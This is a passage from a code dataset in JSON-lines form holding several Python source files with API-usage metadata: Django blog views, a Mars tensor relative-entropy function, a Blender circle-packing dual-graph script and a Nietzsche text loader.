214, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 214, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 235, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 298, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 308, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 308, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 312, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 312, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 318, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 322, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 322, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 323, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 323, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 324, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 358, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 375, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 377, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 377, "usage_type": "name"}, {"api_name": "tools.get_data.GetData", "line_number": 410, "usage_type": "call"}, {"api_name": "tools.pearson.CalcPerson", "line_number": 411, "usage_type": "call"}]} +{"seq_id": "377445186", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Author, Tag, Category, Post, About\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom .forms import FeedbackForm\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\n\n\n# Create your views here.\ndef index(request):\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n author = Author.objects.all()\n about_me = About.objects.all()\n url = \"https://www.iameric.net\"\n return render(request, 'blog/index.html', {\n 'author': author,\n 'about_me': about_me,\n 'recent_posts': recent_posts,\n 'url': url,\n })\n\n\n# view function to display a list of posts\ndef blog_home(request):\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n cates = Category.objects.all()\n tags = Tag.objects.all()\n posts = Post.objects.order_by(\"-id\").all()\n url = \"https://www.iameric.net\"\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n return render(request, 'blog/home.html', {\n 'posts': posts,\n 'recent_posts': recent_posts,\n 'cates': cates,\n 'tags': tags,\n 'url': url,\n })\n\n\ndef blog_post_detail(request, pk):\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n post = Post.objects.get(pk=pk)\n cates = Category.objects.all()\n tags = Tag.objects.all()\n url = \"https://www.iameric.net\"\n query = request.GET.get('q')\n if query:\n search = Post.objects.filter(title__icontains=query)\n else:\n search = Post.objects.all()\n\n return render(request, 'blog/post_detail.html', {\n 'post': post,\n 'recent_posts': recent_posts,\n 'cates': cates,\n 'tags': tags,\n 'search': search,\n 'url': url,\n })\n\n\n# view function to display post by category\ndef blog_post_by_category(request, category_slug):\n category = Category.objects.get(slug=category_slug)\n cates = Category.objects.all()\n posts = Post.objects.filter(category__slug=category_slug)\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n tags = Tag.objects.all()\n url = \"https://www.iameric.net\"\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n context = {\n 'category': category,\n 'posts': posts,\n 'cates': cates,\n 'recent_posts': recent_posts,\n 'tags': tags,\n 'url': url,\n }\n print(category)\n return render(request, 'blog/post_by_category.html', context)\n\n\n# view function to display post by tag\ndef blog_post_by_tag(request, tag_slug):\n tag = Tag.objects.get(slug=tag_slug)\n tags = Tag.objects.all()\n posts = Post.objects.filter(tags__slug=tag_slug)\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n cates = Category.objects.all()\n url = \"https://www.iameric.net\"\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n context = {\n 'tags': tags,\n 'tag': tag,\n 'cates': cates,\n 'posts': posts,\n 'recent_posts': recent_posts,\n 'url': url,\n }\n return render(request, 'blog/post_by_tag.html', context)\n\n\ndef blog_search(request):\n query = request.GET.get('q')\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n cates = Category.objects.all()\n tags = Tag.objects.all()\n url = \"https://www.iameric.net\"\n\n if query:\n posts = Post.objects.filter(title__icontains=query)\n else:\n posts = Post.objects.all()\n\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n return render(request, 'blog/post_search.html', {\n 'posts': posts,\n 'recent_posts': recent_posts,\n 'cates': cates,\n 'tags': tags,\n 'query': query,\n 'url': url,\n })\n\n\ndef blog_feedback(request):\n if request.method == 'POST':\n f = FeedbackForm(request.POST)\n if f.is_valid():\n f.save()\n messages.add_message(request, messages.INFO, 'Feedback Submitted.')\n return redirect('blog_feedback')\n else:\n f = FeedbackForm()\n return render(request, 'blog/feedback.html', {'form': f})", "sub_path": "blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Post.objects.order_by", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Author.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Author.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Author", "line_number": 13, "usage_type": "name"}, {"api_name": "models.About.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "models.About.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.About", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Post.objects.order_by", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 26, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Post.objects.order_by", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 31, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 40, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 43, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Post.objects.order_by", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 57, "usage_type": "name"}, {"api_name": "models.Post.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 58, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 60, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 60, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 64, "usage_type": "name"}, {"api_name": "models.Post.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Category.objects.get", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 80, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 81, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 81, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Post.objects.order_by", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 83, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 84, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 86, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 95, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 98, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Tag.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 117, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 117, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 117, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 118, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 118, "usage_type": "name"}, {"api_name": "models.Post.objects.order_by", "line_number": 119, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 119, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 119, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 120, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 122, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 131, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 134, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "models.Post.objects.order_by", "line_number": 151, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 151, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 152, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 152, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 153, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 153, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 157, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 157, "usage_type": "name"}, {"api_name": "models.Post.objects.all", "line_number": 159, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 159, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 161, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 170, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 173, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "forms.FeedbackForm", "line_number": 189, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 192, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 192, "usage_type": "name"}, {"api_name": "django.contrib.messages.INFO", "line_number": 192, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 193, "usage_type": "call"}, {"api_name": "forms.FeedbackForm", "line_number": 195, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 196, "usage_type": "call"}]} +{"seq_id": "221204784", "text": "# Copyright 1999-2020 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\ntry:\n from scipy.special import rel_entr as scipy_rel_entr\nexcept ImportError: # pragma: no cover\n scipy_rel_entr = None\n\nfrom ... import opcodes as OperandDef\nfrom ...utils import require_not_none\nfrom ..utils import infer_dtype\nfrom .core import TensorSpecialBinOp\n\n\nclass TensorRelEntr(TensorSpecialBinOp):\n _op_type_ = OperandDef.REL_ENTR\n _func_name = 'rel_entr'\n\n def _is_sparse(cls, x1, x2):\n if hasattr(x1, 'issparse') and x1.issparse():\n return True\n return False\n\n\n@require_not_none(scipy_rel_entr)\n@infer_dtype(scipy_rel_entr)\ndef rel_entr(x1, x2, out=None, where=None, **kwargs):\n \"\"\"\n Elementwise function for computing relative entropy.\n\n .. math:: \\mathrm{rel\\_entr}(x, y) = \\begin{cases} x \\log(x / y) & x > 0, y > 0 \\\\ 0 & x = 0, y \\ge 0 \\\\ \\infty & \\text{otherwise} \\end{cases}\n\n Parameters\n ----------\n x : Tensor\n First input tensor.\n y : ndarray\n Second input tensor.\n\n Returns\n -------\n res : Tensor\n Output tensor.\n\n See Also\n --------\n entr, kl_div\n\n Notes\n -----\n This function is jointly convex in x and y.\n \"\"\"\n op = TensorRelEntr(**kwargs)\n return op(x1, x2, out=out, where=where)\n", "sub_path": "mars/tensor/special/rel_entr.py", "file_name": "rel_entr.py", "file_ext": "py", "file_size_in_byte": 1825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.special.rel_entr", "line_number": 18, "usage_type": "name"}, {"api_name": "core.TensorSpecialBinOp", "line_number": 26, "usage_type": "name"}, {"api_name": "utils.require_not_none", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.special.rel_entr", "line_number": 36, "usage_type": "argument"}, {"api_name": "utils.infer_dtype", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.special.rel_entr", "line_number": 37, "usage_type": "argument"}]} +{"seq_id": "517057018", "text": "import math\nimport bpy\n\ndef slope(edge):\n a, b = edge\n ax,ay = a\n bx,by = b\n return (by - ay)/(bx - ax)\n\ndef distance(a,b):\n ax,ay = a\n bx,by = b\n return (abs((ax-bx)**2)+abs((ay-by)**2))**.5\n\ndef slopenormal(edgeslope):\n if edgeslope == 0:\n return 9e20\n return - 1/edgeslope\n\ndef norm(vec):\n ##2d norm\n vx, vy = vec\n d = (abs(vx**2)+abs(vy**2))**.5\n vx = vx/d\n vy = vy/d\n return [vx,vy]\n\ndef scalemultvec(scalar,vec):\n vx,vy = vec\n return [scalar*vx,scalar*vy]\n\ndef ltolintersect(line1,line2):\n ## line is given of the form (a,c) for instance,\n ## where y = ax + c is the form of the line equation\n a,c = line1\n b,d = line2\n return ((d-c)/(a-b),(a*d-b*c)/(a-b))\n\ndef getLine(slope,point):\n x1,y1 = point\n return (slope, y1-slope*x1)\n\ndef midpoint(edge):\n a,b = edge\n return ((a[0]+b[0])/2.0,(a[1]+b[1])/2.0)\n\ndef addvecs(vec1,vec2):\n vx1,vy1 = vec1\n vx2,vy2 = vec2\n return [vx1+vx2,vy1+vy2]\n\ndef v1equalv2(v1,v2):\n v1x,v1y = v1\n v2x,v2y = v2\n if v1x == v2x and v1y == v2y:\n return True\n else:\n return False\n\ndef computeNodePairLine(C1,C2,NodePairLine):\n ## always keyed (c1,c2)\n ## C1 and C2 keyed with tuple (nodeindex,(center,radius))\n ## for circle packing center is in complex coordinates\n ## It is important to know that CirclePacks are approximation\n ## according to the numerical methods used for CirclePack\n ## meaning that Circle may not be perfectly and exactly tangent\n ## in relation to one another. This means that we may need to find\n ## medians where tangency is not completely a given.\n ## This means that we find the tangent point on each of the circle\n ## relative to its provided radius and test both points for position\n ## equality where either point is furnished by vectors running\n ## from one circle center to other. If they are equal then both\n ## circles are completely tangent and generally we are nearly done\n ## computing the dual graph line (we just compute the normal slope\n ## of such line between circle centers) and use our provided tangent\n ## point in determining the line. Otherwise, we'd need to find the\n ## the median between either tangent point on either circle, and\n ## then similarly compute the inverse negative (or normal slope) of\n ## of the original line between circle centers.\n c1node, cpackc1 = C1\n c2node, cpackc2 = C2\n ##print('C1: ', C1)\n ##print('C2: ', C2)\n center1, radius1 = cpackc1\n cx1 = float(center1.real)\n cy1 = float(center1.imag)\n c1 = [cx1,cy1]\n ##print('c1: ', c1)\n center2, radius2 = cpackc2\n cx2 = float(center2.real)\n cy2 = float(center2.imag)\n c2 = [cx2,cy2]\n ##print('c2: ', c2)\n ## two opposite vectors c1-c2 and c2-c1\n v1 = [cx1-cx2,cy1-cy2] ## in the direction of c1 from c2\n v2 = [cx2-cx1,cy2-cy1] ## in the direction of c2 from c1\n ##print('v1: ', v1)\n ##print('v2: ', v2)\n v1 = norm(v1) \n v2 = norm(v2)\n v1 = scalemultvec(radius2,v1) ## tangent point on c2 almost, right length\n ## right direction, but vector not at the right origin\n v2 = scalemultvec(radius1,v2) ## tangent point on c1 almost\n ## translate vectors to their respective points of origin\n v1 = addvecs(v1,c2)\n v2 = addvecs(v2,c1)\n if v1equalv2(v1,v2):\n edge = (v1,c2)\n m = slope(edge)\n m = slopenormal(m)\n line = getLine(m,v1)\n NodePairLine[(c1node,c2node)] = line\n else:\n edge = (v1,v2)\n mpoint = midpoint(edge)\n edge = (mpoint,c1)\n m = slope(edge)\n m = slopenormal(m)\n line = getLine(m,mpoint)\n NodePairLine[(c1node,c2node)] = line\n \nNodePairLine = {}\nTripleIntersect = {}\nvertices = []\nfaces = []\nnodetofaceind = {}\nEdgestofaces = {}\n\n## A circle pack alongside a given Complex is needed here\n\ndef gDualGraphN(Cpack,Complex,Root, NodePairLine, TripleIntersect,\n vertices, faces, nodetofaceind, edgestofaces):\n ## Root is the root node in which to generate dual graph\n ## nodes.\n ## Root nodes should only be 'interior' node from such Complex.\n ## Complex should be in the form of corresponding Complex node keys,\n ## irrespective of interior, exterior designations, with all nodes\n ## having walk (cycle) neighbors indicated.\n ## On Complex dictionary cycle walk for a root node is keyed\n ## 'neighbors' with a list set.\n ## Cpack should have the same corresponding node labels as Complex.\n ## NodePairLine is a tracking dictionary to reduce computation load\n ## by tracking what has already previously been computed.\n ## TripleIntersect is a two level dictionary set. One level\n ## is given by a double node pair followed by a triple third key\n ## which is valued to the intersect vertex index (for the dual graph).\n ## This is for tracking and to avoid adding duplicate vertices.\n ## This is done by computation of double line intersections\n ## where double lines are generated from tangency point computations\n ## between each neighboring node to root and the neighboring node to\n ## neighboring node. These intersections form the dual graph vertices.\n ## All of these vertices together in a walk computation around the root\n ## node form the face of the Dual Graph of a root node. \n neighbors = Complex[Root]['neighbors']\n face = []\n for index, neighbor in enumerate(neighbors):\n\n nneighbor = None\n nindex = None\n if index == len(neighbors)-1:\n nindex = 0\n nneighbor = neighbors[0]\n else:\n nindex = index+1\n nneighbor = neighbors[nindex]\n ## first we check to see that a given node triple\n ## has not already a computed intersect vertex.\n p1 = (neighbor,nneighbor)\n p2 = (nneighbor,neighbor)\n p3 = (Root,neighbor)\n p4 = (neighbor,Root)\n p5 = (Root,nneighbor)\n p6 = (nneighbor,Root)\n u1 = (neighbor,nneighbor) in TripleIntersect\n u2 = (nneighbor,neighbor) in TripleIntersect\n u4 = (Root,neighbor) in TripleIntersect\n u5 = (neighbor,Root) in TripleIntersect\n u6 = (Root,nneighbor) in TripleIntersect\n u7 = (nneighbor,Root) in TripleIntersect\n u3 = None\n if u1:\n if Root in TripleIntersect[p1]:\n u3 = TripleIntersect[p1][Root]\n if u2:\n if Root in TripleIntersect[p2]:\n u3 = TripleIntersect[p2][Root]\n if u4:\n if nneighbor in TripleIntersect[p3]:\n u3 = TripleIntersect[p3][nneighbor]\n if u5:\n if nneighbor in TripleIntersect[p4]:\n u3 = TripleIntersect[p4][nneighbor]\n if u6:\n if neighbor in TripleIntersect[p5]:\n u3 = TripleIntersect[p5][neighbor]\n if u7:\n if neighbor in TripleIntersect[p6]:\n u3 = TripleIntersect[p6][neighbor]\n if u3 == None:\n t1 = (Root,neighbor) in NodePairLine\n t2 = (neighbor,Root) in NodePairLine \n t3 = (Root,nneighbor) in NodePairLine\n t4 = (nneighbor,Root) in NodePairLine\n\n if not t1 and not t2:\n ## compute NodePairLine and store\n C1 = (Root,Cpack[Root])\n C2 = (neighbor,Cpack[neighbor])\n computeNodePairLine(C1,C2,NodePairLine)\n if not t3 and not t4:\n ## compute NodePairLine and store\n C1 = (Root,Cpack[Root])\n C2 = (nneighbor,Cpack[nneighbor])\n computeNodePairLine(C1,C2,NodePairLine)\n line1 = None\n line2 = None\n if t2:\n line1 = NodePairLine[(neighbor,Root)]\n else:\n line1 = NodePairLine[(Root,neighbor)]\n if t4:\n line2 = NodePairLine[(nneighbor,Root)]\n else:\n line2 = NodePairLine[(Root,nneighbor)]\n triplepoint = ltolintersect(line1,line2)\n if triplepoint in vertices:\n tindex = vertices.index(triplepoint)\n else:\n vertices.append(triplepoint)\n tindex = len(vertices)-1\n face.append(tindex)\n TripleIntersect[(Root,neighbor)] = {nneighbor:tindex}\n TripleIntersect[(Root,nneighbor)] = {neighbor:tindex}\n else:\n face.append(u3)\n\n faces.append(face)\n faceind = len(faces)-1\n for ind, vi in enumerate(face):\n nn = None\n if ind == len(face)-1:\n nn = face[0]\n else:\n nn = face[ind +1]\n t1 = (vi,nn) in edgestofaces\n t2 = (nn,vi) in edgestofaces\n \n if not t1:\n edgestofaces[(vi,nn)] = faceind\n nodetofaceind[len(faces)-1] = Cpack[Root]\n\ndef generateDualGraph(pack,CPack, NodePairLine,\n TripleIntersect, vertices, faces, nodetofaceind,\n edgestofaces = Edgestofaces):\n ## pack is interior,exterior,and full complex tuple dictionary package\n interior,exterior,Complex = pack\n for node in interior:\n gDualGraphN(CPack,Complex,node, NodePairLine, TripleIntersect,\n vertices, faces, nodetofaceind, edgestofaces)\n verticesc = []\n for vert in vertices:\n vx,vy = vert\n verticesc.append((vx,vy,0.0))\n vertices = verticesc\n meshName = \"CirclePackingDualGraph\"\n obName = \"CirclePackingDualGraphObj\"\n me = bpy.data.meshes.new(meshName)\n ob = bpy.data.objects.new(obName, me)\n ob.location = bpy.context.scene.cursor_location\n bpy.context.scene.objects.link(ob)\n me.from_pydata(vertices,[],faces) \n me.update(calc_edges=True)\n return (vertices,faces)\n\nvertices, faces = generateDualGraph(packs[0],cpack,NodePairLine,\n TripleIntersect, vertices, faces,\n nodetofaceind)\n\n", "sub_path": "CirclePackDualGraph2.py", "file_name": "CirclePackDualGraph2.py", "file_ext": "py", "file_size_in_byte": 9997, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "bpy.data.meshes.new", "line_number": 267, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 267, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 268, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 268, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 269, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.objects.link", "line_number": 270, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 270, "usage_type": "attribute"}]} +{"seq_id": "85851974", "text": "# Kyuhong Shim 2016\n\nimport numpy as np\nimport nltk\n\n# Nietzsche text data.\n# https://s3.amazonaws.com/text-datasets/nietzsche.txt\n# Download nietzsche.txt, save as ANSI encoding.\n# Change to character-level sequences.\n\n# nltk.download()\n# Download model -> punkt\n\ndef load_nietzsche(base_datapath, mode='character'):\n nietzsche = open(base_datapath + 'nietzsche/nietzsche.txt')\n corpus = nietzsche.read()\n if mode == 'character':\n print('Corpus length: ', len(corpus))\n sequences = list(bytearray(corpus.encode('utf-8'))) \n elif mode == 'word':\n sequences = nltk.word_tokenize(corpus)\n elif mode == 'sentence':\n corpus.replace('\\n', '')\n sequences = nltk.tokenize.sent_tokenize(corpus)\n else:\n raise NotImplementedError('Not yet supported')\n print('Sequence length: ', len(sequences))\n next_sequences = sequences[1:] + [sequences[0]]\n return sequences, next_sequences # return list of characters/words/sentences\n\n\nif __name__ == '__main__':\n base_datapath = 'C:/Users/skhu2/Dropbox/Project/data/'\n sequences, next_sequences = load_nietzsche(base_datapath, mode = 'word')\n print(len(sequences), len(next_sequences))", "sub_path": "lemontree/data/nietzsche.py", "file_name": "nietzsche.py", "file_ext": "py", "file_size_in_byte": 1201, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "nltk.word_tokenize", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 24, "usage_type": "call"}, {"api_name": "nltk.tokenize", "line_number": 